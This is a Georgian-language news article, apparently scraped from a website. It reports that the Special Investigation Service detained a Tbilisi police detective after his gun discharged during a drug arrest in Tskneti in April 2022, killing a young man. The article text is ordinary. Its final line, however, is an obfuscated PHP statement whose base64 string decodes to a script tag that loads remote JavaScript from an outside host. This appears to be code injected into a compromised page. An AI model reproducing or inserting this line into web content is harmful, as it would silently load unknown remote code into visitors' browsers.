celsiusi
ავერსი საქკაბელი
სპეციალური საგამოძიებო სამსახურის ინფორმაციით, დეტექტივი, რომელსაც წყნეთში სამსახურეობრივი მოვალეობის შესრულების დროს იარაღი შემთხვევით გაუვარდა, დაკავებულია.
 
სპეციალური საგამოძიებო სამსახურის უფროსმა, სპეციალურ ბრიფინგზე მომხდარის დეტალები გაასაჯაროვა:
 
"სპეციალური საგამოძიებო სამსახურის თანამშრომლების მიერ, დაკავებული იქნა შინაგან საქმეთა სამინისტროს ქ.თბილისის პოლიციის დეპარტამენტის ძველი თბილისის მე-4 სამმართველოს უფროსი დეტექტივი. საქმეზე ამჟამად მოპოვებული მტკიცებულებებით, მათ შორის, თვითმხილველი მოწმეების მიერ მოწოდებული ინფორმაციით დგინდება, რომ 2022 წლის 18 აპრილს, საღამოს საათებში, თბილისის პოლიციის დეპარტამენტის ძველი თბილისის მე-4 სამმართველოს უფროსი და ამავე სამმართველოს დეტექტივი, სამსახურეობრივი ამტომობილით გადაადგილდებოდნენ წყნეთის ტერიტორიაზე. რა დროსაც სამმართველოს უფროსს მობილურ ტელეფონზე გადასცეს ლადო გუდიაშვილის ქუჩის მიმდებარედ ნარკოტიკული საშუალებით, შესაძლო უკანონოდ შეძენა-შენახვის ფაქტის შესახებ ინფორმაცია.
 
შემთხვევის ადგილზე გამოცხადებისას მათ დახვდათ გაჩერებული ტაქსი, რომლის სიახლოვესაც ახალგაზრდა მამაკაცი მიწაში რაღაც ეძებდა. მიწიდან გაურკვეველი ნივთის ამოღებისთანავე, მამაკაცთან სწრაფად მივიდა პოლიციის დეტექტივი, რომელსაც ხელში ცეცხლსასროლი იარაღი ეჭირა და განუცხადა, რომ ის დაკავებული იყო. ახალგაზრდა მამაკაცმა გადაყლაპა მიწიდან ამოღებული ნივთი და გაქცევა დააპირა. აღნიშნულზე პოლიციელმა სცადა მისი შებოჭვა, რა დროსაც მას იარაღი გაუვარდა, რასაც მამაკაცის გარდაცვალება მოჰყვა. სპეციალურმა საგამოძიებო სამსახურმა, საქმეზე ჩაატარა გადაუდებელი და საპროცესო მოქმედებები, დათვალიერდა შემთხვევის ადგილი, საიდანაც ამოღებული იქნა ექსპერტიზისთვის საჭირო კვლევის ნიმუშები. გამოიკითხნენ პოლიციის თანამშრომლები, ინციდენტის შემსწრე თვითმხილველი მოწმეები და მიმდებარედ მცხოვრები მოქალაქეები. ამოღებული იქნა დანაშაულის იარაღი, რის შემდეგაც, ჩვენს მიერ დაკავებული იქნა პოლიციის დეტექტივი. ეფექტინი გამოძიების უზრუნველყოფის მიზნით, სამსახური ინტენსიურ რეჟიმში აგრძელებს ყველა საჭირო საგამოძიებო და საპროცესო მოქმედებების ჩატარებას. გამოძიებისთვის საჭირო კითხვებზე პასუხის გასაცემად, ინიშნება სასამართლო-სამედიცინო, ბიოლოგიური, ქიმიური, ბალისტიკური, ტრასოლოგიური და დაქტილოსკოპიური ექსპერტიზა,"- განაცხადა სპეციალური საგამოძიებო სამსახურის უფროსმა კოკა კაციტაძემ. 
 
 
827
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");